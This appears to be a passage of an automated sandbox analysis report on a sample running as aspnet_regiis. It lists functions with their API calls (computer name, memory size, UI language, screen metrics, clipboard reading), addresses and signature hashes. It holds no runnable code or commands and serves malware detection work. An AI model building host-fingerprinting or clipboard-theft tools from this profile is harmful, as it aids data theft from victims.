Opcode ID: 5bf1cdd7010988f352e2ce7d64c76417410bc497dddf3d02815cb4a5be810aee
Instruction ID: 28424a62bc2f95f5a845f1c6723ff04d14ba78f8ab246d2957db616bc253c918
Opcode Fuzzy Hash: 5bf1cdd7010988f352e2ce7d64c76417410bc497dddf3d02815cb4a5be810aee
Instruction Fuzzy Hash: D112FD7124D3C18FD7319F28E8987DBBFE1AB97200F185A6CC0D99B292D7784506CB96

Function 027986F0 Relevance: 7.8, APIs: 5, Instructions: 293
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 02798714
GetCurrentThreadId.KERNEL32 ref: 0279871E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0279883D
GetForegroundWindow.USER32 ref: 02798973

Part of subcall function 0279CAD0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0279CAE3

Part of subcall function 0279B540: FreeLibrary.KERNEL32(02798A47), ref: 0279B546
Part of subcall function 0279B540: FreeLibrary.KERNEL32 ref: 0279B567

ExitProcess.KERNEL32 ref: 02798A60

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: 1871819bcfc6a5464ce5812373cfe416f67c92a671bc91381925f31a56f3382b
Instruction ID: ce291361b54c234336c3f74ff591f60a2bd1018f7bc9bee7f6d6a4fdb00d6d58
Opcode Fuzzy Hash: 1871819bcfc6a5464ce5812373cfe416f67c92a671bc91381925f31a56f3382b
Instruction Fuzzy Hash: 9C813672B483044FD718EEAADC8135AB7D7EBC9210F09C53D9988DB392EA749C069791

Function 027BAF45 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 027BB035

Strings

E?s:, xrefs: 027BB1B2
#, xrefs: 027BAF55

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: #$E?s:
API String ID: 3960555810-1163437786
Opcode ID: 8baa5219d4dd83fe74199f279821e646d8d1c4b7ac9291e161a72ce6d1ba4a46
Instruction ID: 5c896eac7e7eb8f5841042af39d47d6327465e74754b9182d481f6cf65dd843e
Opcode Fuzzy Hash: 8baa5219d4dd83fe74199f279821e646d8d1c4b7ac9291e161a72ce6d1ba4a46
Instruction Fuzzy Hash: EAA1E87160D3828BD33ACF2584513EBBBE2AFD6304F18996DD4D987292D779410ACB52

Function 027C2620 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 027C2662
GetSystemMetrics.USER32 ref: 027C2672

Strings

, xrefs: 027C275F

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 3f7587cdae7c62c2fc14d702e2805e50b4a4f119e8f555460a81d8e5b20f16b1
Instruction ID: 376b8b6e109ebbb6e5ba34f80fb551f43fc62881c963aff38c4499425347ac26
Opcode Fuzzy Hash: 3f7587cdae7c62c2fc14d702e2805e50b4a4f119e8f555460a81d8e5b20f16b1
Instruction Fuzzy Hash: D3C159B060A3858FEB74DF1AD6496CBFBF4AB85308F1189ADD5889B350CB745548CF82

Function 027B3288 Relevance: 3.3, APIs: 2, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?), ref: 027B32AD

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 479bbed547b62efafeed414bb21cee3401d8f09f480f4145d907a146132bc28a
Instruction ID: 2c0adb75c84fb586b07ebcf23682b2aa62dbb2fb4b6723a9d322f8e641b826da
Opcode Fuzzy Hash: 479bbed547b62efafeed414bb21cee3401d8f09f480f4145d907a146132bc28a
Instruction Fuzzy Hash: 0191B6B09083809FD711CF25D8916ABBBF4FF86714F40896CF4C69B241E3798946CB92

Function 027CD760 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(027D095A,00000002,00000018,?,?,00000018,?,?,?), ref: 027CD78E

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 027C7B21 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 027C7B27

Strings

afg, xrefs: 027C7BB3, 027C7B5B

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: DefaultLanguageUser
String ID: afg
API String ID: 95929093-2051710476
Opcode ID: a9140bc178d8e696a724dcda909e0ae9b57f0b2a656614dad9c394ec76f6abcc
Instruction ID: 53f075ee487afe618cfa0aa6be89bb8893c892611494c534aab8d7354069ee9d
Opcode Fuzzy Hash: a9140bc178d8e696a724dcda909e0ae9b57f0b2a656614dad9c394ec76f6abcc
Instruction Fuzzy Hash: D6112731F452988FDB2CCA38CC863D9BAA35F8A300F18C1EDC95997380C97A0E018F91

Function 027BCC80 Relevance: 3.1, APIs: 2, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 027BCCEC
GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 027BCDF5

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: c100bf256683b56d14d9e23ca46841779661dd004d419141baa856c4dc2089a8
Instruction ID: 8e48e095e208c803f47dbc06a82f63a037a5a0f99e50f34098fa617a4c912b77
Opcode Fuzzy Hash: c100bf256683b56d14d9e23ca46841779661dd004d419141baa856c4dc2089a8
Instruction Fuzzy Hash: 113139369492808FD72A8F25C8507EBBBE2AFD6314F08C96ED4C9D7344DB385805CB51

Function 027BCC7E Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 027BCCEC
GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 027BCDF5

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 998caf312d6baf90129182b1beef5521841592e962de59e85014e0debf61c9fc
Instruction ID: fdf3deb02a137374645a9f42d0bcf37a992a34220b967e71cf6c5840aa1a7af6
Opcode Fuzzy Hash: 998caf312d6baf90129182b1beef5521841592e962de59e85014e0debf61c9fc
Instruction Fuzzy Hash: DB317676A492408BD72A8F25CC417EBBBA3AFD6314F09C96ED4C9D3384DE785801CB91

Function 0279EA88 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0279EA9A
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0279EAB2

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 0b6ec69123b97f410b0c5fe309cc94be004ce96ab3a77dd7d1b8b422c59c4ecc
Instruction ID: adb615922daeaf4e49ab6fc5c13b48f10be66bec08f0a694f634d4eaedec3c0b
Opcode Fuzzy Hash: 0b6ec69123b97f410b0c5fe309cc94be004ce96ab3a77dd7d1b8b422c59c4ecc
Instruction Fuzzy Hash: 69F0463ABC8320B7F2B84610EE67F0426205B50F20F3A8712BB797E3C186F83811418C

Function 027CE5F1 Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 027CE5F1
GetForegroundWindow.USER32 ref: 027CE602

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 2ae8fca5a80073e53ff7dea0653fcd4c28276048efc5e18bb57586f996690208
Instruction ID: 61cb8645ef957e12b4712157d81c799251f595c7520c582299d31d5a46d972a5
Opcode Fuzzy Hash: 2ae8fca5a80073e53ff7dea0653fcd4c28276048efc5e18bb57586f996690208
Instruction Fuzzy Hash: 56D09EE8E835016BDA0896B6FD094163727A79A3463158819E802C2B17D93595278A57

Function 027BCC2C Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 027BCDF5

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 48d07c753870f480aa571151a119a49d0fdc28d5c98b2dfc59483824ee31d35b
Instruction ID: 8ed8c8b5854d3f1eee9d551cb2c34be07d6c3c5c1e143895a3834d92c2af6bc9
Opcode Fuzzy Hash: 48d07c753870f480aa571151a119a49d0fdc28d5c98b2dfc59483824ee31d35b
Instruction Fuzzy Hash: 95315676A492508BD7298F25C8517EBBBA3AFD6314F09C96EC4C4D3384DE7898018B91

Function 027BCE22 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 027BCEDB

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: ac676719ee80dd655929aa25eb8385e3e4004a4fe6809c616a0793b9b0856840
Instruction ID: d6ff9e3a4ed2a172bd2d8ea35b5e1a44a9d20ac5a33e864b3656fb12e8eafa3d
Opcode Fuzzy Hash: ac676719ee80dd655929aa25eb8385e3e4004a4fe6809c616a0793b9b0856840
Instruction Fuzzy Hash: 8711906450C3C18EDB368B3884687FBBBD5AF97324F188A6EC4D8C7282DB344045CB12

Function 027BCE20 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 027BCEDB

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 2db2b797e33e38ff2a9c34b9e5b43f1a1a3ff47baee5f26fe2e65baf0ce803f7
Instruction ID: 5eb1fb06510fd65c37735c270dd77c164fa865936df17b47623c8bad4d417382
Opcode Fuzzy Hash: 2db2b797e33e38ff2a9c34b9e5b43f1a1a3ff47baee5f26fe2e65baf0ce803f7
Instruction Fuzzy Hash: 5611C07454D3C18FDB368B3889987EBBBD5AF96324F188A6EC5D8C7281DB344045CB12

Function 027CD700 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0279B3D6,00000000,0279B4C3,?,00000000,?,00000000), ref: 027CD732

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1d715f95ff5664d0829f90f8dafe030c676a6351087bd0330ba2da9c54c68939
Instruction ID: d433879ba2e8730e33342b559f6d98576f5728717f33c5040c84f6e51ad3d552
Opcode Fuzzy Hash: 1d715f95ff5664d0829f90f8dafe030c676a6351087bd0330ba2da9c54c68939
Instruction Fuzzy Hash: CCE02B32915612EBC2512E347C0AB173779DFC6720F164C3CF401E7104EA31E811CAA3

Function 027BDC02 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 027BDC4B

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: ec0c63a0c188dd434f4c77eea73e68b7cadcaeec27b9eab93db4ed51db1c9124
Instruction ID: 8b4182d5f0c5ae42fc9ae5fbcd92df0f1156baf177b8abd58aa6b0fa7fb53c97
Opcode Fuzzy Hash: ec0c63a0c188dd434f4c77eea73e68b7cadcaeec27b9eab93db4ed51db1c9124
Instruction Fuzzy Hash: 4AF0E7B46497018FE314DF28D5A571ABBF1FB88704F10980CE4998B394CB799A49CF82

Function 027C100D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 027C1058

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 2e4bda15b3889ea896ccbbb72088f046a58423d4b4a021b9745b202f94fcac5b
Instruction ID: d8208cef2369db336c629b7290e08fa14cd900bdcf780da4d2271e47e025a5de
Opcode Fuzzy Hash: 2e4bda15b3889ea896ccbbb72088f046a58423d4b4a021b9745b202f94fcac5b
Instruction Fuzzy Hash: 04F0D4B05097418FD314DF28D4A871BBBF1FB84308F10880CE4A98B380D7B6AA488F82

Function 0279CAD0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0279CAE3

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0d16af20c42407eb29a8321a7f2d80d1d5fc343a2947bdee367cbc6ae7bbefd4
Instruction ID: 21b227fd4c3b20b2d977c4dac89b188469a55e0b93c4861413640d3d56674213
Opcode Fuzzy Hash: 0d16af20c42407eb29a8321a7f2d80d1d5fc343a2947bdee367cbc6ae7bbefd4
Instruction Fuzzy Hash: 4BD0A7319E15046BD350A57DEC97F263A3CD342715F404B1AF6A2D62C2DD306820D6A5

Function 027CBB30 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,027CD74B,?,0279B3D6,00000000,0279B4C3,?,00000000,?,00000000), ref: 027CBB50

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 10596af35643157b21a0646ccf69674dc0dedd3e212debd1909215d18c38f846
Instruction ID: 88679260165f007f74902f1977714dd7f9450bb54d73139f04e334388ed0c7ea
Opcode Fuzzy Hash: 10596af35643157b21a0646ccf69674dc0dedd3e212debd1909215d18c38f846
Instruction Fuzzy Hash: 10D0C971849132EBCA512B28BC05BC77AA59F49320F4B8D95A844AE0A4D634ACA1CAD4

Function 027CBB10 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,027988C0,DED9EF53), ref: 027CBB20

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 341118bb1871ca0a6d337b9bedbd1088b641adcf925388c3b23efdedcc765217
Instruction ID: 813347a48541c668d5223356325e68f8cd81582edeef8298bcdbb2903f065e71
Opcode Fuzzy Hash: 341118bb1871ca0a6d337b9bedbd1088b641adcf925388c3b23efdedcc765217
Instruction Fuzzy Hash: C2C09B31445120EBC9516B14FC09FC67F55DF55351F154495B444670F4C7706C51CAD4

Non-executed Functions

Function 027C2490 Relevance: 9.1, APIs: 6, Instructions: 111clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 027C24A0
GetClipboardData.USER32 ref: 027C24BB
GlobalLock.KERNEL32 ref: 027C24DA
CloseClipboard.USER32 ref: 027C2600

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: 5b4a193cf51d0dda28bd69d3433a4001e8ff56abae5250852bc9f2777c1f7130
Instruction ID: d5bfa9d0f5b6b60b04fde09be38318792b2378704dfcb46c805eac451847999a
Opcode Fuzzy Hash: 5b4a193cf51d0dda28bd69d3433a4001e8ff56abae5250852bc9f2777c1f7130
Instruction Fuzzy Hash: E041AB7150C7928FC311AF7C945836FBEE1AB86320F184A6DE8E5962D2D634854AC7A3

Function 027B8150 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 408COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 027B81DE
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 027B823F

Strings

67, xrefs: 027B839E

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
